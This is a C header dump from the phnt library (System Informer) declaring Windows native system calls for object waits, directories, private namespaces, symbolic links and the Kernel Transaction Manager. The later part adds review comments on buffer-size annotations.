176 | ); 177 | 178 | NTSYSCALLAPI 179 | NTSTATUS 180 | NTAPI 181 | NtSignalAndWaitForSingleObject( 182 | _In_ HANDLE SignalHandle, 183 | _In_ HANDLE WaitHandle, 184 | _In_ BOOLEAN Alertable, 185 | _In_opt_ PLARGE_INTEGER Timeout 186 | ); 187 | 188 | NTSYSCALLAPI 189 | NTSTATUS 190 | NTAPI 191 | NtWaitForSingleObject( 192 | _In_ HANDLE Handle, 193 | _In_ BOOLEAN Alertable, 194 | _In_opt_ PLARGE_INTEGER Timeout 195 | ); 196 | 197 | NTSYSCALLAPI 198 | NTSTATUS 199 | NTAPI 200 | NtWaitForMultipleObjects( 201 | _In_ ULONG Count, 202 | _In_reads_(Count) HANDLE Handles[], 203 | _In_ WAIT_TYPE WaitType, 204 | _In_ BOOLEAN Alertable, 205 | _In_opt_ PLARGE_INTEGER Timeout 206 | ); 207 | 208 | #if (PHNT_VERSION >= PHNT_WS03) 209 | NTSYSCALLAPI 210 | NTSTATUS 211 | NTAPI 212 | NtWaitForMultipleObjects32( 213 | _In_ ULONG Count, 214 | _In_reads_(Count) LONG Handles[], 215 | _In_ WAIT_TYPE WaitType, 216 | _In_ BOOLEAN Alertable, 217 | _In_opt_ PLARGE_INTEGER Timeout 218 | ); 219 | #endif 220 | 221 | NTSYSCALLAPI 222 | NTSTATUS 223 | NTAPI 224 | NtSetSecurityObject( 225 | _In_ HANDLE Handle, 226 | _In_ SECURITY_INFORMATION SecurityInformation, 227 | _In_ PSECURITY_DESCRIPTOR SecurityDescriptor 228 | ); 229 | 230 | NTSYSCALLAPI 231 | NTSTATUS 232 | NTAPI 233 | NtQuerySecurityObject( 234 | _In_ HANDLE Handle, 235 | _In_ SECURITY_INFORMATION SecurityInformation, 236 | _Out_writes_bytes_opt_(Length) PSECURITY_DESCRIPTOR SecurityDescriptor, 237 | _In_ ULONG Length, 238 | _Out_ PULONG LengthNeeded 239 | ); 240 | 241 | NTSYSCALLAPI 242 | NTSTATUS 243 | NTAPI 244 | NtClose( 245 | _In_ _Post_ptr_invalid_ HANDLE Handle 246 | ); 247 | 248 | #if (PHNT_VERSION >= PHNT_THRESHOLD) 249 | NTSYSCALLAPI 250 | NTSTATUS 251 | NTAPI 252 | NtCompareObjects( 253 | _In_ HANDLE FirstObjectHandle, 254 | _In_ HANDLE SecondObjectHandle 255 | ); 256 | #endif 257 | 258 | #endif 259 | 260 | // Directory objects 261 | 262 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 263 | 264 | NTSYSCALLAPI 265 | NTSTATUS 266 | NTAPI 
267 | NtCreateDirectoryObject( 268 | _Out_ PHANDLE DirectoryHandle, 269 | _In_ ACCESS_MASK DesiredAccess, 270 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 271 | ); 272 | 273 | #if (PHNT_VERSION >= PHNT_WIN8) 274 | NTSYSCALLAPI 275 | NTSTATUS 276 | NTAPI 277 | NtCreateDirectoryObjectEx( 278 | _Out_ PHANDLE DirectoryHandle, 279 | _In_ ACCESS_MASK DesiredAccess, 280 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 281 | _In_ HANDLE ShadowDirectoryHandle, 282 | _In_ ULONG Flags 283 | ); 284 | #endif 285 | 286 | NTSYSCALLAPI 287 | NTSTATUS 288 | NTAPI 289 | NtOpenDirectoryObject( 290 | _Out_ PHANDLE DirectoryHandle, 291 | _In_ ACCESS_MASK DesiredAccess, 292 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 293 | ); 294 | 295 | typedef struct _OBJECT_DIRECTORY_INFORMATION 296 | { 297 | UNICODE_STRING Name; 298 | UNICODE_STRING TypeName; 299 | } OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION; 300 | 301 | NTSYSCALLAPI 302 | NTSTATUS 303 | NTAPI 304 | NtQueryDirectoryObject( 305 | _In_ HANDLE DirectoryHandle, 306 | _Out_writes_bytes_opt_(Length) PVOID Buffer, 307 | _In_ ULONG Length, 308 | _In_ BOOLEAN ReturnSingleEntry, 309 | _In_ BOOLEAN RestartScan, 310 | _Inout_ PULONG Context, 311 | _Out_opt_ PULONG ReturnLength 312 | ); 313 | 314 | #endif 315 | 316 | // Private namespaces 317 | 318 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 319 | 320 | #if (PHNT_VERSION >= PHNT_VISTA) 321 | 322 | // private 323 | typedef enum _BOUNDARY_ENTRY_TYPE 324 | { 325 | OBNS_Invalid, 326 | OBNS_Name, 327 | OBNS_SID, 328 | OBNS_IL 329 | } BOUNDARY_ENTRY_TYPE; 330 | 331 | // private 332 | typedef struct _OBJECT_BOUNDARY_ENTRY 333 | { 334 | BOUNDARY_ENTRY_TYPE EntryType; 335 | ULONG EntrySize; 336 | } OBJECT_BOUNDARY_ENTRY, *POBJECT_BOUNDARY_ENTRY; 337 | 338 | // rev 339 | #define OBJECT_BOUNDARY_DESCRIPTOR_VERSION 1 340 | 341 | // private 342 | typedef struct _OBJECT_BOUNDARY_DESCRIPTOR 343 | { 344 | ULONG Version; 345 | ULONG Items; 346 | ULONG TotalSize; 347 | union 348 | { 349 | ULONG Flags; 350 | 
struct 351 | { 352 | ULONG AddAppContainerSid : 1; 353 | ULONG Reserved : 31; 354 | }; 355 | }; 356 | } OBJECT_BOUNDARY_DESCRIPTOR, *POBJECT_BOUNDARY_DESCRIPTOR; 357 | 358 | NTSYSCALLAPI 359 | NTSTATUS 360 | NTAPI 361 | NtCreatePrivateNamespace( 362 | _Out_ PHANDLE NamespaceHandle, 363 | _In_ ACCESS_MASK DesiredAccess, 364 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 365 | _In_ POBJECT_BOUNDARY_DESCRIPTOR BoundaryDescriptor 366 | ); 367 | 368 | NTSYSCALLAPI 369 | NTSTATUS 370 | NTAPI 371 | NtOpenPrivateNamespace( 372 | _Out_ PHANDLE NamespaceHandle, 373 | _In_ ACCESS_MASK DesiredAccess, 374 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 375 | _In_ POBJECT_BOUNDARY_DESCRIPTOR BoundaryDescriptor 376 | ); 377 | 378 | NTSYSCALLAPI 379 | NTSTATUS 380 | NTAPI 381 | NtDeletePrivateNamespace( 382 | _In_ HANDLE NamespaceHandle 383 | ); 384 | 385 | #endif 386 | 387 | #endif 388 | 389 | // Symbolic links 390 | 391 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 392 | 393 | NTSYSCALLAPI 394 | NTSTATUS 395 | NTAPI 396 | NtCreateSymbolicLinkObject( 397 | _Out_ PHANDLE LinkHandle, 398 | _In_ ACCESS_MASK DesiredAccess, 399 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 400 | _In_ PUNICODE_STRING LinkTarget 401 | ); 402 | 403 | NTSYSCALLAPI 404 | NTSTATUS 405 | NTAPI 406 | NtOpenSymbolicLinkObject( 407 | _Out_ PHANDLE LinkHandle, 408 | _In_ ACCESS_MASK DesiredAccess, 409 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 410 | ); 411 | 412 | NTSYSCALLAPI 413 | NTSTATUS 414 | NTAPI 415 | NtQuerySymbolicLinkObject( 416 | _In_ HANDLE LinkHandle, 417 | _Inout_ PUNICODE_STRING LinkTarget, 418 | _Out_opt_ PULONG ReturnedLength 419 | ); 420 | 421 | typedef enum _SYMBOLIC_LINK_INFO_CLASS 422 | { 423 | SymbolicLinkGlobalInformation = 1, // s: ULONG 424 | SymbolicLinkAccessMask, // s: ACCESS_MASK 425 | MaxnSymbolicLinkInfoClass 426 | } SYMBOLIC_LINK_INFO_CLASS; 427 | 428 | #if (PHNT_VERSION >= PHNT_THRESHOLD) 429 | NTSYSCALLAPI 430 | NTSTATUS 431 | NTAPI 432 | NtSetInformationSymbolicLink( 433 | _In_ HANDLE 
LinkHandle, 434 | _In_ SYMBOLIC_LINK_INFO_CLASS SymbolicLinkInformationClass, 435 | _In_reads_bytes_(SymbolicLinkInformationLength) PVOID SymbolicLinkInformation, 436 | _In_ ULONG SymbolicLinkInformationLength 437 | ); 438 | #endif 439 | 440 | #endif 441 | 442 | #endif 443 | -------------------------------------------------------------------------------- /phnt/include/nttmapi.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Transaction Manager support functions 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTTMAPI_H 8 | #define _NTTMAPI_H 9 | 10 | #if (PHNT_VERSION >= PHNT_VISTA) 11 | NTSYSCALLAPI 12 | NTSTATUS 13 | NTAPI 14 | NtCreateTransactionManager( 15 | _Out_ PHANDLE TmHandle, 16 | _In_ ACCESS_MASK DesiredAccess, 17 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 18 | _In_opt_ PUNICODE_STRING LogFileName, 19 | _In_opt_ ULONG CreateOptions, 20 | _In_opt_ ULONG CommitStrength 21 | ); 22 | #endif 23 | 24 | #if (PHNT_VERSION >= PHNT_VISTA) 25 | NTSYSCALLAPI 26 | NTSTATUS 27 | NTAPI 28 | NtOpenTransactionManager( 29 | _Out_ PHANDLE TmHandle, 30 | _In_ ACCESS_MASK DesiredAccess, 31 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 32 | _In_opt_ PUNICODE_STRING LogFileName, 33 | _In_opt_ LPGUID TmIdentity, 34 | _In_opt_ ULONG OpenOptions 35 | ); 36 | #endif 37 | 38 | #if (PHNT_VERSION >= PHNT_VISTA) 39 | NTSYSCALLAPI 40 | NTSTATUS 41 | NTAPI 42 | NtRenameTransactionManager( 43 | _In_ PUNICODE_STRING LogFileName, 44 | _In_ LPGUID ExistingTransactionManagerGuid 45 | ); 46 | #endif 47 | 48 | #if (PHNT_VERSION >= PHNT_VISTA) 49 | NTSYSCALLAPI 50 | NTSTATUS 51 | NTAPI 52 | NtRollforwardTransactionManager( 53 | _In_ HANDLE TransactionManagerHandle, 54 | _In_opt_ PLARGE_INTEGER TmVirtualClock 55 | ); 56 | #endif 57 | 58 | #if (PHNT_VERSION >= PHNT_VISTA) 59 | NTSYSCALLAPI 60 | NTSTATUS 61 | NTAPI 62 | NtRecoverTransactionManager( 63 | _In_ HANDLE TransactionManagerHandle 64 | ); 65 | #endif 66 | 67 | 
#if (PHNT_VERSION >= PHNT_VISTA) 68 | NTSYSCALLAPI 69 | NTSTATUS 70 | NTAPI 71 | NtQueryInformationTransactionManager( 72 | _In_ HANDLE TransactionManagerHandle, 73 | _In_ TRANSACTIONMANAGER_INFORMATION_CLASS TransactionManagerInformationClass, 74 | _Out_writes_bytes_(TransactionManagerInformationLength) PVOID TransactionManagerInformation, 75 | _In_ ULONG TransactionManagerInformationLength, 76 | _Out_opt_ PULONG ReturnLength 77 | ); 78 | #endif 79 | 80 | #if (PHNT_VERSION >= PHNT_VISTA) 81 | NTSYSCALLAPI 82 | NTSTATUS 83 | NTAPI 84 | NtSetInformationTransactionManager( 85 | _In_opt_ HANDLE TmHandle, 86 | _In_ TRANSACTIONMANAGER_INFORMATION_CLASS TransactionManagerInformationClass, 87 | _In_reads_bytes_(TransactionManagerInformationLength) PVOID TransactionManagerInformation, 88 | _In_ ULONG TransactionManagerInformationLength 89 | ); 90 | #endif 91 | 92 | #if (PHNT_VERSION >= PHNT_VISTA) 93 | NTSYSCALLAPI 94 | NTSTATUS 95 | NTAPI 96 | NtEnumerateTransactionObject( 97 | _In_opt_ HANDLE RootObjectHandle, 98 | _In_ KTMOBJECT_TYPE QueryType, 99 | _Inout_updates_bytes_(ObjectCursorLength) PKTMOBJECT_CURSOR ObjectCursor, 100 | _In_ ULONG ObjectCursorLength, 101 | _Out_ PULONG ReturnLength 102 | ); 103 | #endif 104 | 105 | #if (PHNT_VERSION >= PHNT_VISTA) 106 | NTSYSCALLAPI 107 | NTSTATUS 108 | NTAPI 109 | NtCreateTransaction( 110 | _Out_ PHANDLE TransactionHandle, 111 | _In_ ACCESS_MASK DesiredAccess, 112 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 113 | _In_opt_ LPGUID Uow, 114 | _In_opt_ HANDLE TmHandle, 115 | _In_opt_ ULONG CreateOptions, 116 | _In_opt_ ULONG IsolationLevel, 117 | _In_opt_ ULONG IsolationFlags, 118 | _In_opt_ PLARGE_INTEGER Timeout, 119 | _In_opt_ PUNICODE_STRING Description 120 | ); 121 | #endif 122 | 123 | #if (PHNT_VERSION >= PHNT_VISTA) 124 | NTSYSCALLAPI 125 | NTSTATUS 126 | NTAPI 127 | NtOpenTransaction( 128 | _Out_ PHANDLE TransactionHandle, 129 | _In_ ACCESS_MASK DesiredAccess, 130 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 131 | 
_In_opt_ LPGUID Uow,
    _In_opt_ HANDLE TmHandle
    );
#endif

// Transaction, enlistment and resource-manager system-call prototypes.
// Every declaration below is gated on PHNT_VERSION >= PHNT_VISTA. The SAL
// annotations are the only contract visible in this header: where a buffer is
// annotated _Out_writes_bytes_(N) / _In_reads_bytes_(N), N is the companion
// *Length parameter, so callers must pass the true size of the buffer they
// hand in. Buffers annotated with a bare _In_ / _Out_ plus a separate size
// parameter are called out individually below.

#if (PHNT_VERSION >= PHNT_VISTA)
// Query/set pair: the information buffer is bounded by
// TransactionInformationLength; ReturnLength is optional on the query side.
NTSYSCALLAPI
NTSTATUS
NTAPI
NtQueryInformationTransaction(
    _In_ HANDLE TransactionHandle,
    _In_ TRANSACTION_INFORMATION_CLASS TransactionInformationClass,
    _Out_writes_bytes_(TransactionInformationLength) PVOID TransactionInformation,
    _In_ ULONG TransactionInformationLength,
    _Out_opt_ PULONG ReturnLength
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtSetInformationTransaction(
    _In_ HANDLE TransactionHandle,
    _In_ TRANSACTION_INFORMATION_CLASS TransactionInformationClass,
    _In_reads_bytes_(TransactionInformationLength) PVOID TransactionInformation,
    _In_ ULONG TransactionInformationLength
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
// Commit/rollback take a BOOLEAN Wait; what the call does when Wait is FALSE
// is not stated in this header.
NTSYSCALLAPI
NTSTATUS
NTAPI
NtCommitTransaction(
    _In_ HANDLE TransactionHandle,
    _In_ BOOLEAN Wait
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtRollbackTransaction(
    _In_ HANDLE TransactionHandle,
    _In_ BOOLEAN Wait
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
// Enlistment objects. EnlistmentKey is an opaque, optional PVOID here; the
// same parameter reappears on NtRecoverEnlistment.
NTSYSCALLAPI
NTSTATUS
NTAPI
NtCreateEnlistment(
    _Out_ PHANDLE EnlistmentHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ HANDLE ResourceManagerHandle,
    _In_ HANDLE TransactionHandle,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_opt_ ULONG CreateOptions,
    _In_ NOTIFICATION_MASK NotificationMask,
    _In_opt_ PVOID EnlistmentKey
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtOpenEnlistment(
    _Out_ PHANDLE EnlistmentHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ HANDLE ResourceManagerHandle,
    _In_ LPGUID EnlistmentGuid,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtQueryInformationEnlistment(
    _In_ HANDLE EnlistmentHandle,
    _In_ ENLISTMENT_INFORMATION_CLASS EnlistmentInformationClass,
    _Out_writes_bytes_(EnlistmentInformationLength) PVOID EnlistmentInformation,
    _In_ ULONG EnlistmentInformationLength,
    _Out_opt_ PULONG ReturnLength
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
// NOTE(review): EnlistmentHandle is annotated _In_opt_ here, unlike every
// other enlistment call in this header; whether NULL is meaningful is not
// stated here — confirm before relying on it.
NTSYSCALLAPI
NTSTATUS
NTAPI
NtSetInformationEnlistment(
    _In_opt_ HANDLE EnlistmentHandle,
    _In_ ENLISTMENT_INFORMATION_CLASS EnlistmentInformationClass,
    _In_reads_bytes_(EnlistmentInformationLength) PVOID EnlistmentInformation,
    _In_ ULONG EnlistmentInformationLength
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtRecoverEnlistment(
    _In_ HANDLE EnlistmentHandle,
    _In_opt_ PVOID EnlistmentKey
    );
#endif

// The following enlistment-phase calls share one shape: an enlistment handle
// plus an optional TmVirtualClock (PLARGE_INTEGER). Nothing in this header
// states the units or meaning of TmVirtualClock.

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtPrePrepareEnlistment(
    _In_ HANDLE EnlistmentHandle,
    _In_opt_ PLARGE_INTEGER TmVirtualClock
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtPrepareEnlistment(
    _In_ HANDLE EnlistmentHandle,
    _In_opt_ PLARGE_INTEGER TmVirtualClock
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtCommitEnlistment(
    _In_ HANDLE EnlistmentHandle,
    _In_opt_ PLARGE_INTEGER TmVirtualClock
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtRollbackEnlistment(
    _In_ HANDLE EnlistmentHandle,
    _In_opt_ PLARGE_INTEGER TmVirtualClock
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtPrePrepareComplete(
    _In_ HANDLE EnlistmentHandle,
    _In_opt_ PLARGE_INTEGER TmVirtualClock
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtPrepareComplete(
    _In_ HANDLE EnlistmentHandle,
    _In_opt_ PLARGE_INTEGER TmVirtualClock
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtCommitComplete(
    _In_ HANDLE EnlistmentHandle,
    _In_opt_ PLARGE_INTEGER TmVirtualClock
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtReadOnlyEnlistment(
    _In_ HANDLE EnlistmentHandle,
    _In_opt_ PLARGE_INTEGER TmVirtualClock
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtRollbackComplete(
    _In_ HANDLE EnlistmentHandle,
    _In_opt_ PLARGE_INTEGER TmVirtualClock
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtSinglePhaseReject(
    _In_ HANDLE EnlistmentHandle,
    _In_opt_ PLARGE_INTEGER TmVirtualClock
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
// Resource-manager objects. Create requires RmGuid; Open takes the GUID
// optionally (ResourceManagerGuid) alongside optional ObjectAttributes.
NTSYSCALLAPI
NTSTATUS
NTAPI
NtCreateResourceManager(
    _Out_ PHANDLE ResourceManagerHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ HANDLE TmHandle,
    _In_ LPGUID RmGuid,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_opt_ ULONG CreateOptions,
    _In_opt_ PUNICODE_STRING Description
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtOpenResourceManager(
    _Out_ PHANDLE ResourceManagerHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ HANDLE TmHandle,
    _In_opt_ LPGUID ResourceManagerGuid,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtRecoverResourceManager(
    _In_ HANDLE ResourceManagerHandle
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
// NOTE(review): TransactionNotification is a bare _Out_ rather than
// _Out_writes_bytes_(NotificationLength), so the annotation does not tie the
// buffer to its size; NotificationLength presumably sizes it — size the
// buffer accordingly and check ReturnLength when supplied. The meaning of the
// Asynchronous flag and AsynchronousContext is not stated in this header.
NTSYSCALLAPI
NTSTATUS
NTAPI
NtGetNotificationResourceManager(
    _In_ HANDLE ResourceManagerHandle,
    _Out_ PTRANSACTION_NOTIFICATION TransactionNotification,
    _In_ ULONG NotificationLength,
    _In_opt_ PLARGE_INTEGER Timeout,
    _Out_opt_ PULONG ReturnLength,
    _In_ ULONG Asynchronous,
    _In_opt_ ULONG_PTR AsynchronousContext
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtQueryInformationResourceManager(
    _In_ HANDLE ResourceManagerHandle,
    _In_ RESOURCEMANAGER_INFORMATION_CLASS ResourceManagerInformationClass,
    _Out_writes_bytes_(ResourceManagerInformationLength) PVOID ResourceManagerInformation,
    _In_ ULONG ResourceManagerInformationLength,
    _Out_opt_ PULONG ReturnLength
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtSetInformationResourceManager(
    _In_ HANDLE ResourceManagerHandle,
    _In_ RESOURCEMANAGER_INFORMATION_CLASS ResourceManagerInformationClass,
    _In_reads_bytes_(ResourceManagerInformationLength) PVOID ResourceManagerInformation,
    _In_ ULONG ResourceManagerInformationLength
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
// NOTE(review): ProtocolInformation is a bare _In_ PVOID with a separate
// ProtocolInformationSize; the size is not bound to the buffer by annotation.
// Note the first parameter is named ResourceManager, not ResourceManagerHandle.
NTSYSCALLAPI
NTSTATUS
NTAPI
NtRegisterProtocolAddressInformation(
    _In_ HANDLE ResourceManager,
    _In_ PCRM_PROTOCOL_ID ProtocolId,
    _In_ ULONG ProtocolInformationSize,
    _In_ PVOID ProtocolInformation,
    _In_opt_ ULONG CreateOptions
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
// Buffer is a bare _In_ PVOID sized by BufferLength (not bound by annotation).
NTSYSCALLAPI
NTSTATUS
NTAPI
NtPropagationComplete(
    _In_ HANDLE ResourceManagerHandle,
    _In_ ULONG RequestCookie,
    _In_ ULONG BufferLength,
    _In_ PVOID Buffer
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
NTSYSCALLAPI
NTSTATUS
NTAPI
NtPropagationFailed(
    _In_ HANDLE ResourceManagerHandle,
    _In_ ULONG RequestCookie,
    _In_ NTSTATUS PropStatus
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
// private — marked as such in this header; no public contract is visible here
// for either timeout beyond their PLARGE_INTEGER types.
NTSYSCALLAPI
NTSTATUS
NTAPI
NtFreezeTransactions(
    _In_ PLARGE_INTEGER FreezeTimeout,
    _In_ PLARGE_INTEGER ThawTimeout
    );
#endif

#if (PHNT_VERSION >= PHNT_VISTA)
// private — marked as such in this header.
NTSYSCALLAPI
NTSTATUS
NTAPI
NtThawTransactions(
    VOID
    );
#endif

#endif